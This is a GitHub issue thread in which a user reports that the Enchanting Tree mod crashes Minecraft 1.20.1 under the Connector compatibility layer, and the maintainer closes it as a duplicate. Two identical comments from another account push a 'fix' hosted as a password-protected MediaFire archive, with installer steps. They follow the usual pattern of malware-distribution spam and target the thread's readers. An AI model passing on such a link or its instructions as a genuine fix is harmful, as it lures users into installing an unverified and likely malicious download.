### ISSUE TITLE
Enchanting Tree

### ISSUE THREAD

**Issue by xXMolgadoGamer01Xx** [Sinytra/Connector#1363] opened 2024-08-27 02:02 UTC
### Mod Name

Enchanting Tree

### Mod Homepage

https://modrinth.com/mod/enchantingtree

### Minecraft version

1.20.1 (LTS)

### Describe the bug

The game crashes on startup with exit code 2

### Steps to reproduce

1. Install Connector combo and Enchanting Tree on NeoForge
2. Start the game
3. See how it crash
...

### Logs

Debug: https://pastebin.com/khum3t8i

### Additional context

sss

**Comment by amir1387aht** [comment] 2024-08-27 02:05
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment] 2024-08-27 02:18
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Su5eD** [comment] 2024-08-27 14:27
Duplicate of #1362

**Closed as not planned by Su5eD** 2024-08-27 14:27 UTC
Labels: duplicate
